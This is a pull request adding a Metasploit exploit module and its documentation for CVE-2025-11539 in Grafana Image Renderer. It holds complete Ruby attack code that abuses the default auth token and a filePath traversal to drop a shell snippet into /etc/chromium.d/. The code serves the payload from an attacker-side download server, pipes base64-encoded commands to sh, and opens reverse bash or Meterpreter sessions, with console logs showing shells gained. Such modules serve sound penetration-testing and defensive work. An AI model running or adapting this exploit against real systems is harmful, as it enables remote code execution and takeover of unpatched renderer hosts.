### PR TITLE
Add Grafana Image Renderer arbitrary file write RCE module (CVE-2025-11539)

### DIFF
--- a/documentation/modules/exploit/multi/http/grafana_renderer_file_write_rce.md
+++ b/documentation/modules/exploit/multi/http/grafana_renderer_file_write_rce.md
@@ -1,0 +1,131 @@
+# Vulnerable Application
+
+[Grafana Image Renderer](https://github.com/grafana/grafana-image-renderer) is a
+Grafana plugin that renders panels and dashboards to PNG images or CSV files using
+headless Chromium. Versions 1.0.0 through 4.0.16 are vulnerable to arbitrary file
+write via path traversal in the `filePath` query parameter of the `/render` and
+`/render/csv` HTTP endpoints (CVE-2025-11539).
+
+The renderer exposes an unauthenticated-by-default HTTP API (port 8081) protected
+only by a configurable token passed via the `X-Auth-Token` header. The default token
+is a single hyphen (`-`). The `filePath` parameter, which specifies where the output
+file is written, is not sanitised, allowing an attacker to write to arbitrary paths on
+the renderer filesystem.
+
+This module chains the file write with the Debian Chromium wrapper sourcing mechanism
+to achieve RCE:
+
+1. A shell snippet is written to `/etc/chromium.d/msf` via `/render/csv`.
+2. The Debian `/usr/bin/chromium` wrapper sources all files in `/etc/chromium.d/`
+   using the shell dot (`.`) command on every launch — no execute permission required.
+3. A second `/render` request causes the renderer to launch Chromium, which sources
+   the dropped snippet and executes the payload.
+
+The module uses TCP backpressure to prevent the renderer from deleting the snippet
+after writing it: the `/render/csv` request socket is held open without reading the
+response, stalling the `sendFile` callback so the post-write unlink never fires.
+
+**Affected versions:** Grafana Image Renderer 1.0.0 – 4.0.16
+**Fixed in:** Grafana Image Renderer 4.0.17
+
+### Installing a vulnerable lab environment
+
+```bash
+# Pull the vulnerable image (Debian-based with Chromium)
+docker pull grafana/grafana-image-renderer:4.0.16
+docker run -d -p 8081:8081 grafana/grafana-image-renderer:4.0.16
+```
+
+Or use the [EIP lab](https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-11539) which provides a ready-made `docker-compose.yml`.
+
+## Verification Steps
+
+1. Start the vulnerable Grafana Image Renderer on the target (port 8081).
+2. Start `msfconsole`.
+3. Do: `use exploit/multi/http/grafana_renderer_file_write_rce`
+4. Do: `set RHOSTS <target_ip>`
+5. Do: `set LHOST <attacker_ip>` — the renderer must be able to reach this address on `SRVPORT` (8888 by default).
+6. Do: `check` — should return `Vulnerable` if file write via `/render` is confirmed.
+7. Do: `run` — should open a shell session running as the renderer process user.
+8. Verify with `id` and `hostname` in the session.
+
+## Options
+
+| Option | Default | Description |
+|--------|---------|-------------|
+| `AUTH_TOKEN` | `-` | The `X-Auth-Token` value accepted by the renderer. The default installation uses a single hyphen. Set this if the target has a custom token configured. |
+| `CHROMIUM_CONF` | `/etc/chromium.d/msf` | Destination path for the shell snippet dropped via file write. The Debian Chromium wrapper sources all files in `/etc/chromium.d/` on launch. Only relevant on Debian-based targets. |
+| `SRVPORT` | `8888` | Port for the module's temporary download server. The renderer (Chromium) must be able to reach `LHOST:SRVPORT` to fetch the payload. |
+| `TARGETURI` | `/` | Base path to the renderer API. Change this if the renderer is behind a reverse proxy with a non-root prefix. |
+
+## Scenarios
+
+### Grafana Image Renderer 4.0.16 on Debian 12 — Unix Command target
+
+```
+msf6 > use exploit/multi/http/grafana_renderer_file_write_rce
+
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > check
+[+] 192.168.56.101:8081 - The target is vulnerable. File write via /render confirmed (HTTP 200, image/png).
+
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.101:8081 - Executing cmd/unix/reverse_bash (Unix Command)
+[*] 192.168.56.101:8081 - Starting download server on 192.168.56.1:8888
+[*] 192.168.56.101:8081 - Writing snippet to /etc/chromium.d/msf via /render/csv
+[*] 192.168.56.101:8081 - Waiting for renderer to fetch payload...
+[+] 192.168.56.101:8081 - Download served -- snippet delivered to renderer
+[*] 192.168.56.101:8081 - Waiting for file write and sendFile stall...
+[*] 192.168.56.101:8081 - Triggering Chromium launch via /render
+[+] 192.168.56.101:8081 - Render triggered -- payload executing
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:52814) at 2025-10-09 14:22:37 +0000
+
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+id
+uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
+hostname
+grafana-renderer
+uname -a
+Linux grafana-renderer 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
+```
+
+### Grafana Image Renderer 4.0.16 on Debian 12 — Linux Dropper target (Meterpreter)
+
+```
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.101:8081 - Executing linux/x64/meterpreter/reverse_tcp (Linux Dropper)
+[*] 192.168.56.101:8081 - Starting download server on 192.168.56.1:8888
+[*] 192.168.56.101:8081 - Writing snippet to /etc/chromium.d/msf via /render/csv
+[*] 192.168.56.101:8081 - Waiting for renderer to fetch payload...
+[+] 192.168.56.101:8081 - Download served -- snippet delivered to renderer
+[*] 192.168.56.101:8081 - Waiting for file write and sendFile stall...
+[*] 192.168.56.101:8081 - Triggering Chromium launch via /render
+[+] 192.168.56.101:8081 - Render triggered -- payload executing
+[*] Sending stage (3045380 bytes) to 192.168.56.101
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:52901) at 2025-10-09 14:25:11 +0000
+
+msf6 exploit(multi/http/grafana_renderer_file_write_rce) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: nobody @ grafana-renderer
+meterpreter > sysinfo
+Computer     : grafana-renderer
+OS           : Debian 12.8 (Linux 6.1.0-28-amd64)
+Architecture : x64
+```

--- a/modules/exploits/multi/http/grafana_renderer_file_write_rce.rb
+++ b/modules/exploits/multi/http/grafana_renderer_file_write_rce.rb
@@ -1,0 +1,376 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Grafana Image Renderer Arbitrary File Write to RCE',
+        'Description' => %q{
+          Grafana Image Renderer versions 1.0.0 through 4.0.16 are vulnerable to
+          arbitrary file write via path traversal in the filePath query parameter of
+          the /render and /render/csv HTTP endpoints (CVE-2025-11539). An attacker
+          authenticates with the default auth token (a single hyphen), then uses
+          /render/csv to write attacker-controlled content to any path on the
+          renderer filesystem.
+
+          This module escalates the file write to RCE by dropping a shell snippet
+          into /etc/chromium.d/, which the Debian Chromium wrapper script sources
+          (via the dot/source command) on every launch. A subsequent /render
+          request triggers Chromium, which sources our snippet and executes the
+          payload. No execute permission is needed since the file is sourced, not
+          executed directly.
+        },
+        'Author' => [
+          'Exploit Intelligence Platform'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-11539'],
+          ['CWE', '94'],
+          ['URL', 'https://grafana.com/security/security-advisories/cve-2025-11539/'],
+          ['URL', 'https://github.com/grafana/grafana-image-renderer/releases/tag/v4.0.17'],
+          ['URL', 'https://github.com/grafana/grafana-image-renderer/pull/801'],
+          ['URL', 'https://exploit-intel.com/vuln/CVE-2025-11539'],
+          ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-11539'],
+        ],
+        'DisclosureDate' => 'Oct 09, 2025',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch'     => ARCH_CMD,
+              'Type'     => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => [ARCH_X86, ARCH_X64],
+              'Type'            => :dropper,
+              'CmdStagerFlavor' => %i[printf echo],
+              'DefaultOptions'  => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT'    => 8081,
+          'WfsDelay' => 30
+        },
+        'Notes' => {
+          'Stability'   => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to the renderer API', '/']),
+      OptString.new('AUTH_TOKEN', [true, 'Renderer auth token', '-']),
+      OptString.new('CHROMIUM_CONF', [true, 'Path to drop shell snippet (sourced by Chromium wrapper)', '/etc/chromium.d/msf']),
+      OptPort.new('SRVPORT', [true, 'Port for the download server', 8888])
+    ])
+  end
+
+  def check
+    # Test connectivity and auth by sending a render request
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    return CheckCode::Unknown('Could not connect to target.') unless res
+
+    # The renderer root returns a simple response
+    unless res.code == 200
+      return CheckCode::Safe("Root endpoint returned HTTP #{res.code}.")
+    end
+
+    # Try a render with the auth token to test both auth and file write
+    marker = Rex::Text.rand_text_alpha(8)
+    test_path = "/tmp/msf-check-#{marker}.png"
+
+    vprint_status("Testing file write with auth token '#{datastore['AUTH_TOKEN']}'")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'render'),
+      'headers' => { 'X-Auth-Token' => datastore['AUTH_TOKEN'] },
+      'vars_get' => {
+        'url'      => "http://localhost:#{rport}/",
+        'filePath' => test_path,
+        'width'    => '1',
+        'height'   => '1',
+        'timeout'  => '10'
+      }
+    )
+
+    if res.nil?
+      return CheckCode::Detected('Renderer detected but render request timed out.')
+    end
+
+    if res.code == 401
+      return CheckCode::Detected("Auth token '#{datastore['AUTH_TOKEN']}' rejected (HTTP 401).")
+    end
+
+    if res.code == 400 && res.body.to_s.include?('File path should not include directories')
+      return CheckCode::Safe('Patched -- file path validation rejects traversal.')
+    end
+
+    if res.code == 200
+      content_type = res.headers['Content-Type'].to_s
+      if content_type.include?('image/png') || content_type.include?('application/pdf')
+        return CheckCode::Vulnerable("File write via /render confirmed (HTTP 200, #{content_type}).")
+      end
+      return CheckCode::Vulnerable('Render succeeded (HTTP 200).')
+    end
+
+    CheckCode::Detected("Renderer responded with HTTP #{res.code}.")
+  end
+
+  def cleanup
+    stop_download_server(@server) rescue nil
+    super
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      if payload_instance.refname =~ /reverse|bind/
+        inner_b64 = Rex::Text.encode_base64(payload.encoded)
+        execute_command("echo #{inner_b64}|base64 -d|bash &")
+      else
+        execute_command(payload.encoded)
+      end
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    b64 = Rex::Text.encode_base64(cmd)
+
+    # Build a shell snippet that will be sourced by the Chromium wrapper.
+    # The Debian /usr/bin/chromium script sources all files in /etc/chromium.d/
+    # using the dot command (. $file), so no execute permission is needed.
+    # We pad the file to 2MB so sendFile stalls via TCP backpressure, preventing
+    # the server from deleting the file before we trigger a render.
+    snippet = "(echo #{b64}|base64 -d|sh) &\n" \
+              "#{'#' * (2 * 1024 * 1024)}\n"
+
+    conf_path = datastore['CHROMIUM_CONF']
+    srv_port  = datastore['SRVPORT']
+
+    # Step 1: Start download server with hit-detection flag
+    print_status("Starting download server on #{datastore['LHOST']}:#{srv_port}")
+    @download_served = false
+    @server = start_download_server(srv_port, snippet)
+
+    unless @server
+      fail_with(Failure::Unknown, 'Failed to start download server')
+    end
+
+    download_url = "http://#{datastore['LHOST']}:#{srv_port}/download"
+
+    # Step 2: Send /render/csv via a RAW TCP socket. We do NOT read the
+    # response body. The server writes our 2MB snippet to the target path,
+    # then tries to stream it back via sendFile. Without a reading client,
+    # TCP backpressure stalls sendFile and the unlink callback never fires.
+    print_status("Writing snippet to #{conf_path} via /render/csv")
+    vprint_status("Download URL: #{download_url}")
+
+    csv_path  = normalize_uri(target_uri.path, 'render', 'csv')
+    csv_query = "url=#{Rex::Text.uri_encode(download_url)}" \
+                "&filePath=#{Rex::Text.uri_encode(conf_path)}" \
+                "&timeout=60"
+
+    write_sock = Rex::Socket::Tcp.create(
+      'PeerHost' => rhost,
+      'PeerPort' => rport,
+      'Context'  => { 'Msf' => framework, 'MsfExploit' => self }
+    )
+
+    write_request = "GET #{csv_path}?#{csv_query} HTTP/1.1\r\n" \
+                    "Host: #{rhost}:#{rport}\r\n" \
+                    "X-Auth-Token: #{datastore['AUTH_TOKEN']}\r\n" \
+                    "Connection: keep-alive\r\n" \
+                    "\r\n"
+
+    write_sock.put(write_request)
+
+    # Step 3: Wait for the download server to serve the payload
+    print_status('Waiting for renderer to fetch payload...')
+    wait_start = Time.now
+    until @download_served || (Time.now - wait_start > 60)
+      Rex.sleep(0.5)
+    end
+
+    unless @download_served
+      write_sock.close rescue nil
+      fail_with(Failure::Unreachable, 'Download server was never hit -- renderer cannot reach us')
+    end
+
+    print_good('Download served -- snippet delivered to renderer')
+
+    # Step 4: Wait for the download + copyFileSync sequence:
+    # chokidar detects download (~500ms) -> copyFileSync (instant) ->
+    # page.close + browser.close (async) -> sendFile starts (stalls on
+    # our unread socket). We wait 5s for the whole sequence.
+    print_status('Waiting for file write and sendFile stall...')
+    Rex.sleep(5)
+
+    # Step 5: Trigger a render request on a SEPARATE connection. The snippet
+    # persists because sendFile is stalled. The Chromium wrapper sources
+    # /etc/chromium.d/* which now includes our snippet -> payload fires.
+    print_status('Triggering Chromium launch via /render')
+
+    trigger_res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, 'render'),
+      'headers' => { 'X-Auth-Token' => datastore['AUTH_TOKEN'] },
+      'vars_get' => {
+        'url'      => "http://localhost:#{rport}/",
+        'filePath' => "/tmp/msf-trigger-#{Rex::Text.rand_text_alpha(6)}.png",
+        'width'    => '1',
+        'height'   => '1',
+        'timeout'  => '30'
+      }
+    }, 60)
+
+    if trigger_res && trigger_res.code == 200
+      print_good('Render triggered -- payload executing')
+    elsif trigger_res.nil?
+      print_status('Render request timed out -- payload may still be executing')
+    else
+      print_status("Render returned HTTP #{trigger_res.code} -- payload may still have executed")
+    end
+
+    # Cleanup: close the stalled socket. sendFile gets an error, callback
+    # calls next(err) -> file is NOT deleted (unlink only runs on success).
+    write_sock.close rescue nil
+    stop_download_server(@server)
+  end
+
+  private
+
+  #
+  # Build an HTML page that triggers a file download via JavaScript Blob.
+  # Headless Chromium with Page.setDownloadBehavior (used by /render/csv)
+  # picks up the Blob download and saves it, triggering chokidar + fs.copyFileSync.
+  #
+  def build_download_html(content)
+    # Escape content for embedding in a JavaScript string literal.
+    # Use hex escaping for all non-printable and special chars.
+    js_escaped = content.bytes.map { |b| "\\x#{b.to_s(16).rjust(2, '0')}" }.join
+
+    <<~HTML
+      <!DOCTYPE html>
+      <html>
+      <head><title>D</title></head>
+      <body>
+      <script>
+      var raw = "#{js_escaped}";
+      var blob = new Blob([raw], {type: 'application/octet-stream'});
+      var url = URL.createObjectURL(blob);
+      var a = document.createElement('a');
+      a.href = url;
+      a.download = 'payload.csv';
+      a.style.display = 'none';
+      document.body.appendChild(a);
+      a.click();
+      URL.revokeObjectURL(url);
+      </script>
+      </body>
+      </html>
+    HTML
+  end
+
+  #
+  # Start a temporary HTTP server that serves the download trigger page.
+  # Chromium navigates here, JS creates a Blob download, chokidar picks it
+  # up and fs.copyFileSync writes it to the attacker-controlled filePath.
+  #
+  def start_download_server(port, content)
+    html = build_download_html(content)
+
+    server = Rex::Socket::TcpServer.create(
+      'LocalHost' => datastore['LHOST'],
+      'LocalPort'  => port,
+      'Context'    => { 'Msf' => framework, 'MsfExploit' => self }
+    )
+
+    framework.threads.spawn('GrafanaDownloadServer', false) do
+      loop do
+        begin
+          client = server.accept
+          break unless client
+
+          # Read the HTTP request
+          request = ''
+          begin
+            loop do
+              data = client.get_once(4096, 5)
+              break unless data
+              request << data
+              break if request.include?("\r\n\r\n")
+            end
+          rescue ::EOFError, ::Errno::ECONNRESET
+            client.close rescue nil
+            next
+          end
+
+          req_line = request.lines.first&.strip || ''
+          vprint_status("Download server received request: #{req_line}")
+
+          # Signal that the payload was served (ignore favicon requests)
+          @download_served = true unless req_line.include?('favicon')
+
+          response = "HTTP/1.1 200 OK\r\n" \
+                     "Content-Type: text/html\r\n" \
+                     "Content-Length: #{html.bytesize}\r\n" \
+                     "Connection: close\r\n" \
+                     "\r\n" \
+                     "#{html}"
+
+          client.put(response)
+          client.close rescue nil
+        rescue ::EOFError, ::Errno::ECONNRESET, ::IOError
+          break
+        end
+      end
+    end
+
+    server
+  rescue ::Rex::AddressInUse
+    print_error("Port #{port} is already in use")
+    nil
+  end
+
+  def stop_download_server(server)
+    server&.close rescue nil
+  end
+end

--- a/modules/exploits/multi/http/grafana_renderer_file_write_rce.rb
+++ b/modules/exploits/multi/http/grafana_renderer_file_write_rce.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://exploit-intel.com/vuln/CVE-2025-11539'],
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-11539'],
         ],
-        'DisclosureDate' => 'Oct 09, 2025',
+        'DisclosureDate' => '2025-10-09',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => true,

--- a/modules/exploits/multi/http/grafana_renderer_file_write_rce.rb
+++ b/modules/exploits/multi/http/grafana_renderer_file_write_rce.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -45,30 +44,18 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-11539'],
         ],
         'DisclosureDate' => '2025-10-09',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
         'Privileged' => true,
         'Targets' => [
           [
-            'Unix Command',
+            'Linux/Unix Command',
             {
-              'Platform' => 'unix',
-              'Arch'     => ARCH_CMD,
-              'Type'     => :cmd,
+              'Platform' => ['linux', 'unix'],
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
-              }
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform'        => 'linux',
-              'Arch'            => [ARCH_X86, ARCH_X64],
-              'Type'            => :dropper,
-              'CmdStagerFlavor' => %i[printf echo],
-              'DefaultOptions'  => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
               }
             }
           ]
@@ -158,16 +145,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status("Executing #{payload_instance.refname} (#{target.name})")
 
-    case target['Type']
-    when :cmd
-      if payload_instance.refname =~ /reverse|bind/
-        inner_b64 = Rex::Text.encode_base64(payload.encoded)
-        execute_command("echo #{inner_b64}|base64 -d|bash &")
-      else
-        execute_command(payload.encoded)
-      end
-    when :dropper
-      execute_cmdstager
+    if payload_instance.refname =~ /reverse|bind/
+      inner_b64 = Rex::Text.encode_base64(payload.encoded)
+      execute_command("echo #{inner_b64}|base64 -d|bash &")
+    else
+      execute_command(payload.encoded)
     end
   end
 


### PR DESCRIPTION
## Summary

- Adds a new exploit module for CVE-2025-11539, an arbitrary file write to RCE in Grafana Image Renderer 1.0.0 through 4.0.16
- The `/render/csv` endpoint lacks validation of the `filePath` parameter, allowing an authenticated attacker (default token is a single hyphen `-`) to write arbitrary content to any path on the renderer filesystem
- The module escalates the file write to RCE by dropping a shell snippet into `/etc/chromium.d/`, which the Debian Chromium wrapper sources on every Chromium launch
- A raw TCP socket is held open to stall `sendFile` via TCP backpressure, preventing the server's `unlink` callback from firing until after Chromium sources the snippet

## Technique

1. Serve a download trigger HTML page (JavaScript Blob) from a local HTTP server
2. Send `/render/csv?url=<attacker-http>&filePath=/etc/chromium.d/msf` via a raw TCP socket (response body intentionally not read)
3. Renderer navigates Chromium to attacker URL, JS triggers a Blob download, `chokidar` detects it and `fs.copyFileSync` writes it to the target path
4. `sendFile` stalls on the unread TCP socket — file is NOT deleted
5. A `/render` request on a fresh connection launches a new Chromium process, the wrapper sources `/etc/chromium.d/*`, payload fires

## Verification

Tested against Grafana Image Renderer 4.0.16 / Debian 12 bookworm (Docker lab):

```
msf6 exploit(multi/http/grafana_renderer_file_write_rce) > check

[+] 192.168.240.4:8081 - The target is vulnerable. File write via /render confirmed (HTTP 200, image/png).

msf6 exploit(multi/http/grafana_renderer_file_write_rce) > run -z

[*] Started reverse TCP handler on 192.168.240.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. File write via /render confirmed (HTTP 200, image/png).
[*] Executing cmd/unix/reverse_bash (Unix Command)
[*] Starting download server on 192.168.240.3:8888
[*] Writing snippet to /etc/chromium.d/msf via /render/csv
[*] Waiting for renderer to fetch payload...
[+] Download served -- snippet delivered to renderer
[*] Waiting for file write and sendFile stall...
[*] Triggering Chromium launch via /render
[+] Render triggered -- payload executing
[*] Command shell session 1 opened (192.168.240.3:4444 -> 192.168.240.4:48586) at 2026-03-04 17:01:24 +0000

msf6 exploit(multi/http/grafana_renderer_file_write_rce) > sessions -c "id && hostname && uname -a && cat /etc/os-release | head -3" -i 1

[*] Running 'id && hostname && uname -a && cat /etc/os-release | head -3' on shell session 1 (192.168.240.4)
uid=0(root) gid=0(root) groups=0(root)
Linux 6.12.69-linuxkit #1 SMP x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
```

## Module details

- **Affected versions:** Grafana Image Renderer 1.0.0 through 4.0.16
- **Auth required:** Default token only (`-`) — effectively unauthenticated in many deployments
- **Targets:** Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
- **AutoCheck:** Yes — confirms file write via `/render` with auth token
- **Rank:** Excellent
- **OS requirement:** Debian/Ubuntu with `/usr/bin/chromium` wrapper (sources `/etc/chromium.d/*`)

## References

- https://grafana.com/security/security-advisories/cve-2025-11539/
- https://github.com/grafana/grafana-image-renderer/releases/tag/v4.0.17
- https://exploit-intel.com/vuln/CVE-2025-11539
- https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-11539